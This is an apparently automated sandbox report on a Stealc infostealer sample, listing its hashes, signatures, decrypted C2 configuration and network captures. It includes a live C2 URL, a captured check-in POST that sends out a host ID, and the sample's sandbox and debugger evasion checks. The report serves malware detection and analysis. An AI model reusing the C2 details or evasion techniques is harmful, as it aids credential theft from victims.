Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1545915
MD5:	6b2b5a158403acb7ba15c52a59282cab
SHA1:	dae583617b2057015ff1c7ada6d9bf6c0e262481
SHA256:	f7bbc837510990dd6831eb9ab92b7fe5d9238f105ea9690bdf5808dc0e5cfbbf
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6B2B5A158403ACB7BA15C52A59282CAB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2037496917.0000000005190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 5952	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 5952	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.cd0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T10:15:02.495046+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	185.215.113.206	80	TCP

Code function: 0_2_00CD62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00CD62D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 32 38 46 36 46 35 32 36 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="hwid"A428F6F526363848468766------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="build"tale------JKKEHJDHJKFIECAAKFIJ--

Source: file.exe, 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2091636092.000000000157E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/$
Source: file.exe, 00000000.00000002.2091636092.00000000015C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/405117-2476756634-1003ge
Source: file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091636092.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2091636092.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpAC
Source: file.exe, 00000000.00000002.2091636092.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpeC
Source: file.exe, 00000000.00000002.2091636092.00000000015DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/d?
Source: file.exe, file.exe, 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2037496917.00000000051BB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D10098	0_2_00D10098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2B198	0_2_00D2B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D02138	0_2_00D02138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E	0_2_0102F30E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337	0_2_01128337
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D14288	0_2_00D14288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3E258	0_2_00D3E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01017221	0_2_01017221
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4D39E	0_2_00D4D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012012E4	0_2_012012E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D5B308	0_2_00D5B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_010D853F	0_2_010D853F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0112D5DC	0_2_0112D5DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0112345A	0_2_0112345A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D145A8	0_2_00D145A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3D5A8	0_2_00D3D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFE544	0_2_00CFE544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012024BA	0_2_012024BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CF4573	0_2_00CF4573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D166C8	0_2_00D166C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D596FD	0_2_00D596FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4A648	0_2_00D4A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011267FA	0_2_011267FA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0100D603	0_2_0100D603
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D46799	0_2_00D46799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0111C676	0_2_0111C676
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2D720	0_2_00D2D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3F8D6	0_2_00D3F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0112F926	0_2_0112F926
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D298B8	0_2_00D298B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2B8A8	0_2_00D2B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D24868	0_2_00D24868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01130B4D	0_2_01130B4D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01118B72	0_2_01118B72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D38BD9	0_2_00D38BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0112BA0D	0_2_0112BA0D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D40B88	0_2_00D40B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D44BA8	0_2_00D44BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D4AC28	0_2_00D4AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D24DC8	0_2_00D24DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01124C52	0_2_01124C52
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D25DB9	0_2_00D25DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D01D78	0_2_00D01D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D2BD68	0_2_00D2BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D3AD38	0_2_00D3AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D41EE8	0_2_00D41EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01017F9B	0_2_01017F9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00D18E78	0_2_00D18E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01129EFA	0_2_01129EFA

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00CD4610 appears 316 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: nrgnjalz ZLIB complexity 0.9948620709295262

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00CE9790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00CE3970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\L5KLWO0A.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2123776 > 1048576

Source: file.exe

Static PE information: Raw size of nrgnjalz is bigger than: 0x100000 < 0x19b800

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2037496917.00000000051BB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2037496917.00000000051BB000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.cd0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nrgnjalz:EW;wpavutyr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nrgnjalz:EW;wpavutyr:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00CE9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00CE9BB0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x20d304 should be: 0x2165e3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: nrgnjalz
Source: file.exe	Static PE information: section name: wpavutyr
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011D510D push ebx; mov dword ptr [esp], edx	0_2_011D5498
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFA0DC push eax; retf	0_2_00CFA0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011EB1AE push 3F7FF5FDh; mov dword ptr [esp], ecx	0_2_011EB32C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011CE1AE push edx; mov dword ptr [esp], eax	0_2_011CE1CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0119A1D1 push edi; mov dword ptr [esp], ecx	0_2_0119A21C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011E61F3 push 0BFBBF38h; mov dword ptr [esp], ebp	0_2_011E65B5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0117401D push 345DEF0Dh; mov dword ptr [esp], edi	0_2_011740FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0117401D push 4596BC85h; mov dword ptr [esp], esi	0_2_01174216
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012440A8 push eax; mov dword ptr [esp], 0304A7EAh	0_2_01244113
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00CFA118 push eax; retf	0_2_00CFA119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011E00ED push edx; mov dword ptr [esp], eax	0_2_011E0132
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011E00ED push edi; mov dword ptr [esp], eax	0_2_011E014D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0121432B push edx; mov dword ptr [esp], eax	0_2_0121437B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push 4DD61400h; mov dword ptr [esp], edi	0_2_0102F3C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push edi; mov dword ptr [esp], ecx	0_2_0102F441
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push eax; mov dword ptr [esp], ecx	0_2_0102F459
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push eax; mov dword ptr [esp], edx	0_2_0102F4DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push ecx; mov dword ptr [esp], ebp	0_2_0102F4EA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push 355ED405h; mov dword ptr [esp], eax	0_2_0102F4FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0102F30E push edi; mov dword ptr [esp], esi	0_2_0102F52A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_011A5338 push ebx; mov dword ptr [esp], eax	0_2_011A5368
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 5475B052h; mov dword ptr [esp], edx	0_2_011283B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 3EC7C93Fh; mov dword ptr [esp], ebx	0_2_011283D1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 10E259BEh; mov dword ptr [esp], edi	0_2_01128432
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 7FBE81E4h; mov dword ptr [esp], ecx	0_2_01128457
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 310FC622h; mov dword ptr [esp], ecx	0_2_01128522
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 5B025774h; mov dword ptr [esp], ecx	0_2_0112856A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push esi; mov dword ptr [esp], eax	0_2_011285DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push edx; mov dword ptr [esp], ecx	0_2_011286B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push eax; mov dword ptr [esp], ecx	0_2_011286FC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01128337 push 510D125Dh; mov dword ptr [esp], ebx	0_2_01128755

Source: file.exe

Static PE information: section name: nrgnjalz entropy: 7.95429774987272

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00CE9BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-37983

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBE2C5 second address: FBE2CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113773C second address: 1137759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF09325AC3h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137759 second address: 113775F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113775F second address: 1137765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137765 second address: 1137769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1137769 second address: 113778B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBF09325AC4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FBF09325AB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11367A8 second address: 11367B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FBF08D33348h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11367B8 second address: 11367C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007FBF09325AB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11367C5 second address: 11367E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007FBF08D33346h 0x0000000e jbe 00007FBF08D33346h 0x00000014 jns 00007FBF08D33346h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136957 second address: 113697E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnc 00007FBF09325AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1136E7B second address: 1136E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBF08D33346h 0x0000000a pop edi 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A379 second address: 113A389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF09325ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A3F5 second address: 113A456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FBF08D33348h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 call 00007FBF08D33349h 0x00000028 jmp 00007FBF08D3334Fh 0x0000002d push eax 0x0000002e pushad 0x0000002f jmp 00007FBF08D33359h 0x00000034 jl 00007FBF08D3334Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A456 second address: 113A4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a jmp 00007FBF09325ABAh 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 popad 0x00000016 mov eax, dword ptr [eax] 0x00000018 jnl 00007FBF09325ADCh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113A4A8 second address: 113A4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
